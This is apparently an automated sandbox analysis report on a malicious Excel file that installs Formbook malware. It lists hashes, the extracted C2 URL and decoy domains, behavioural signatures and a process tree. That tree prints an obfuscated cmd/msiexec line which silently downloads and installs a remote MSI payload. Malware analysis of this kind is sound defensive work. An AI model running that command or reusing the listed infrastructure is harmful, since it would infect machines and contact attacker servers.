Analysis
-
max time kernel
152s -
max time network
153s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
07-05-2021 12:17
Behavioral task
behavioral1
Sample
fadb21a70ab5923cbe8e8deeb36af5e07efd0e87.xls
Resource
win7v20210408
General
-
Target
fadb21a70ab5923cbe8e8deeb36af5e07efd0e87.xls
-
Size
37KB
-
MD5
abc73f6301b9f828dce46943b7111f29
-
SHA1
fadb21a70ab5923cbe8e8deeb36af5e07efd0e87
-
SHA256
ac0ccf59d64faf079e0d4e93ec994865214aefd0899f644da81f8e748e4ee153
-
SHA512
00f1499e6db64cf9bc94bba3a90382f5b045a3e291e65ef8db68a916cf586353d48ac7509c30c14c0da1b1557ac96ba60cf2a5214321395892473634dc56b813
Malware Config
Extracted
formbook
4.1
http://www.craftsman-vail.com/cca/
whenpigsflyhigh.com
artistiklounge.com
tinytrendstique.com
projektpartner-ag.com
charvelevh.com
easycompliances.net
zengheqiye.com
professionalmallorca.com
bonzerstudio.com
nelivo.com
yangxeric.com
aredntech.com
twincitieshousingmarket.com
allshadesunscreen.com
xiang-life.net
qmcp00011.com
lindsayeandmarkv.com
fbcsbvsbvsjbvjs.com
saveonthrivelife.com
newdpo.com
raazjewellers.com
sangsterdesign.com
thedatdaiquiris.com
uljanarattel.com
daebak.cloud
hurricanekickgg.com
mercadilloartisanalfoods.com
salahdinortho.com
thisislandonbraverman.com
siliconesampler.com
youxiaoke.online
trucity.net
mychicpartyboutique.com
adsvestglobal.com
lidoshoreslistings.info
mexicoaprende.online
4-2ararinost.com
kevinberginlbi.com
vaudqa.com
alignedenergetics.info
conmielyconhiel.com
urweddingsite.com
angelshead.com
renejewels.com
sim201.com
fkdjjkdjkrefefe.com
thecontentchicks.com
sarikayalar.net
herspacephilly.com
fortwayneduiattorney.com
vallejocardealers.com
gmworldservice.com
mybuddyryde.net
zeneanyasbyerika.com
downloadhs.com
hernonymous.com
suu6.com
xuehuasa.ltd
miacting.com
thefreedomenvelope.com
yihuisq.net
steamshipautjority.com
lowcarblovefnp.com
knm.xyz
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1996 1920 cmd.exe EXCEL.EXE -
Formbook Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1060-75-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/1092-82-0x00000000000C0000-0x00000000000EE000-memory.dmp formbook -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 7 1784 msiexec.exe -
Executes dropped EXE 2 IoCs
Processes:
MSI8DC2.tmpMSI8DC2.tmppid process 768 MSI8DC2.tmp 1060 MSI8DC2.tmp -
Loads dropped DLL 1 IoCs
Processes:
MSI8DC2.tmppid process 768 MSI8DC2.tmp -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 1540 msiexec.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MSI8DC2.tmpMSI8DC2.tmpcolorcpl.exedescription pid process target process PID 768 set thread context of 1060 768 MSI8DC2.tmp MSI8DC2.tmp PID 1060 set thread context of 1252 1060 MSI8DC2.tmp Explorer.EXE PID 1092 set thread context of 1252 1092 colorcpl.exe Explorer.EXE -
Drops file in Windows directory 6 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI8DC2.tmp msiexec.exe File opened for modification C:\Windows\Installer\f748b11.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI870B.tmp msiexec.exe File created C:\Windows\Installer\f748b11.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI8D43.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
Processes:
resource yara_rule C:\Windows\Installer\MSI8DC2.tmp nsis_installer_1 C:\Windows\Installer\MSI8DC2.tmp nsis_installer_2 C:\Windows\Installer\MSI8DC2.tmp nsis_installer_1 C:\Windows\Installer\MSI8DC2.tmp nsis_installer_2 C:\Windows\Installer\MSI8DC2.tmp nsis_installer_1 C:\Windows\Installer\MSI8DC2.tmp nsis_installer_2 -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE -
Modifies data under HKEY_USERS 1 IoCs
Processes:
msiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad msiexec.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1920 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
msiexec.exeMSI8DC2.tmpcolorcpl.exepid process 1784 msiexec.exe 1784 msiexec.exe 1060 MSI8DC2.tmp 1060 MSI8DC2.tmp 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe 1092 colorcpl.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
MSI8DC2.tmpMSI8DC2.tmpcolorcpl.exepid process 768 MSI8DC2.tmp 1060 MSI8DC2.tmp 1060 MSI8DC2.tmp 1060 MSI8DC2.tmp 1092 colorcpl.exe 1092 colorcpl.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
msiexec.exemsiexec.exeMSI8DC2.tmpExplorer.EXEcolorcpl.exedescription pid process Token: SeShutdownPrivilege 1540 msiexec.exe Token: SeIncreaseQuotaPrivilege 1540 msiexec.exe Token: SeRestorePrivilege 1784 msiexec.exe Token: SeTakeOwnershipPrivilege 1784 msiexec.exe Token: SeSecurityPrivilege 1784 msiexec.exe Token: SeCreateTokenPrivilege 1540 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1540 msiexec.exe Token: SeLockMemoryPrivilege 1540 msiexec.exe Token: SeIncreaseQuotaPrivilege 1540 msiexec.exe Token: SeMachineAccountPrivilege 1540 msiexec.exe Token: SeTcbPrivilege 1540 msiexec.exe Token: SeSecurityPrivilege 1540 msiexec.exe Token: SeTakeOwnershipPrivilege 1540 msiexec.exe Token: SeLoadDriverPrivilege 1540 msiexec.exe Token: SeSystemProfilePrivilege 1540 msiexec.exe Token: SeSystemtimePrivilege 1540 msiexec.exe Token: SeProfSingleProcessPrivilege 1540 msiexec.exe Token: SeIncBasePriorityPrivilege 1540 msiexec.exe Token: SeCreatePagefilePrivilege 1540 msiexec.exe Token: SeCreatePermanentPrivilege 1540 msiexec.exe Token: SeBackupPrivilege 1540 msiexec.exe Token: SeRestorePrivilege 1540 msiexec.exe Token: SeShutdownPrivilege 1540 msiexec.exe Token: SeDebugPrivilege 1540 msiexec.exe Token: SeAuditPrivilege 1540 msiexec.exe Token: SeSystemEnvironmentPrivilege 1540 msiexec.exe Token: SeChangeNotifyPrivilege 1540 msiexec.exe Token: SeRemoteShutdownPrivilege 1540 msiexec.exe Token: SeUndockPrivilege 1540 msiexec.exe Token: SeSyncAgentPrivilege 1540 msiexec.exe Token: SeEnableDelegationPrivilege 1540 msiexec.exe Token: SeManageVolumePrivilege 1540 msiexec.exe Token: SeImpersonatePrivilege 1540 msiexec.exe Token: SeCreateGlobalPrivilege 1540 msiexec.exe Token: SeRestorePrivilege 1784 msiexec.exe Token: SeTakeOwnershipPrivilege 1784 msiexec.exe Token: SeRestorePrivilege 1784 msiexec.exe Token: SeTakeOwnershipPrivilege 1784 msiexec.exe Token: SeRestorePrivilege 1784 msiexec.exe Token: SeTakeOwnershipPrivilege 1784 msiexec.exe Token: SeRestorePrivilege 1784 msiexec.exe Token: SeTakeOwnershipPrivilege 1784 msiexec.exe Token: SeRestorePrivilege 1784 msiexec.exe Token: SeTakeOwnershipPrivilege 1784 msiexec.exe Token: SeRestorePrivilege 1784 msiexec.exe Token: SeTakeOwnershipPrivilege 1784 msiexec.exe Token: SeDebugPrivilege 1060 MSI8DC2.tmp Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeDebugPrivilege 1092 colorcpl.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
EXCEL.EXEExplorer.EXEpid process 1920 EXCEL.EXE 1920 EXCEL.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE -
Suspicious use of SendNotifyMessage 19 IoCs
Processes:
Explorer.EXEpid process 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 1920 EXCEL.EXE 1920 EXCEL.EXE 1920 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
EXCEL.EXEcmd.exemsiexec.exeMSI8DC2.tmpExplorer.EXEcolorcpl.exedescription pid process target process PID 1920 wrote to memory of 1996 1920 EXCEL.EXE cmd.exe PID 1920 wrote to memory of 1996 1920 EXCEL.EXE cmd.exe PID 1920 wrote to memory of 1996 1920 EXCEL.EXE cmd.exe PID 1920 wrote to memory of 1996 1920 EXCEL.EXE cmd.exe PID 1996 wrote to memory of 1540 1996 cmd.exe msiexec.exe PID 1996 wrote to memory of 1540 1996 cmd.exe msiexec.exe PID 1996 wrote to memory of 1540 1996 cmd.exe msiexec.exe PID 1996 wrote to memory of 1540 1996 cmd.exe msiexec.exe PID 1996 wrote to memory of 1540 1996 cmd.exe msiexec.exe PID 1996 wrote to memory of 1540 1996 cmd.exe msiexec.exe PID 1996 wrote to memory of 1540 1996 cmd.exe msiexec.exe PID 1784 wrote to memory of 768 1784 msiexec.exe MSI8DC2.tmp PID 1784 wrote to memory of 768 1784 msiexec.exe MSI8DC2.tmp PID 1784 wrote to memory of 768 1784 msiexec.exe MSI8DC2.tmp PID 1784 wrote to memory of 768 1784 msiexec.exe MSI8DC2.tmp PID 768 wrote to memory of 1060 768 MSI8DC2.tmp MSI8DC2.tmp PID 768 wrote to memory of 1060 768 MSI8DC2.tmp MSI8DC2.tmp PID 768 wrote to memory of 1060 768 MSI8DC2.tmp MSI8DC2.tmp PID 768 wrote to memory of 1060 768 MSI8DC2.tmp MSI8DC2.tmp PID 768 wrote to memory of 1060 768 MSI8DC2.tmp MSI8DC2.tmp PID 1252 wrote to memory of 1092 1252 Explorer.EXE colorcpl.exe PID 1252 wrote to memory of 1092 1252 Explorer.EXE colorcpl.exe PID 1252 wrote to memory of 1092 1252 Explorer.EXE colorcpl.exe PID 1252 wrote to memory of 1092 1252 Explorer.EXE colorcpl.exe PID 1092 wrote to memory of 1264 1092 colorcpl.exe cmd.exe PID 1092 wrote to memory of 1264 1092 colorcpl.exe cmd.exe PID 1092 wrote to memory of 1264 1092 colorcpl.exe cmd.exe PID 1092 wrote to memory of 1264 1092 colorcpl.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\fadb21a70ab5923cbe8e8deeb36af5e07efd0e87.xls2⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/tfv88791.msi /qn3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemSiExec /i http://farm-finn.com/admin/tfv88791.msi /qn4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Installer\MSI8DC2.tmp"3⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSI8DC2.tmp"C:\Windows\Installer\MSI8DC2.tmp"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSI8DC2.tmp"C:\Windows\Installer\MSI8DC2.tmp"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Installer\MSI8DC2.tmpMD5
caccaec6ca54e341eb266b3b98978178
SHA1e02d383072613e1e65a8991adc941b65a82f8be7
SHA25620b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479
SHA512838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e
-
C:\Windows\Installer\MSI8DC2.tmpMD5
caccaec6ca54e341eb266b3b98978178
SHA1e02d383072613e1e65a8991adc941b65a82f8be7
SHA25620b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479
SHA512838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e
-
C:\Windows\Installer\MSI8DC2.tmpMD5
caccaec6ca54e341eb266b3b98978178
SHA1e02d383072613e1e65a8991adc941b65a82f8be7
SHA25620b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479
SHA512838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e
-
\Users\Admin\AppData\Local\Temp\nsx8E8A.tmp\0djwv1e4o91gu5.dllMD5
b8efcf07411a1081f73080bd83f3bf1e
SHA1b534be3372f363f2ae50be8fa8fd94fec8c0dae2
SHA2567faeba7a3e10c3eccd92d119327a0d7e8b0aa99c7ca956326bff1c83ce011440
SHA5123ba6a145c27d62f4d8cfea644945a86d1321e61e0677bae217cc5003f4fad486e56481354f8fd7c46aceea69c6f1824b8efbe17461e319a48940d8b63a53f79c
-
memory/768-74-0x00000000004B0000-0x00000000004B2000-memory.dmpFilesize
8KB
-
memory/768-67-0x0000000000000000-mapping.dmp
-
memory/1060-77-0x0000000000A10000-0x0000000000A24000-memory.dmpFilesize
80KB
-
memory/1060-76-0x0000000000700000-0x0000000000A03000-memory.dmpFilesize
3.0MB
-
memory/1060-75-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/1060-72-0x000000000041EB70-mapping.dmp
-
memory/1092-79-0x0000000000000000-mapping.dmp
-
memory/1092-85-0x0000000000A10000-0x0000000000AA3000-memory.dmpFilesize
588KB
-
memory/1092-84-0x0000000000C40000-0x0000000000F43000-memory.dmpFilesize
3.0MB
-
memory/1092-81-0x0000000000F60000-0x0000000000F78000-memory.dmpFilesize
96KB
-
memory/1092-82-0x00000000000C0000-0x00000000000EE000-memory.dmpFilesize
184KB
-
memory/1252-86-0x0000000007D50000-0x0000000007ED0000-memory.dmpFilesize
1.5MB
-
memory/1252-78-0x0000000006BE0000-0x0000000006D2E000-memory.dmpFilesize
1.3MB
-
memory/1264-83-0x0000000000000000-mapping.dmp
-
memory/1540-65-0x0000000076691000-0x0000000076693000-memory.dmpFilesize
8KB
-
memory/1540-64-0x0000000000000000-mapping.dmp
-
memory/1784-66-0x000007FEFBFB1000-0x000007FEFBFB3000-memory.dmpFilesize
8KB
-
memory/1920-61-0x00000000716C1000-0x00000000716C3000-memory.dmpFilesize
8KB
-
memory/1920-60-0x000000002F651000-0x000000002F654000-memory.dmpFilesize
12KB
-
memory/1920-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1996-63-0x0000000000000000-mapping.dmp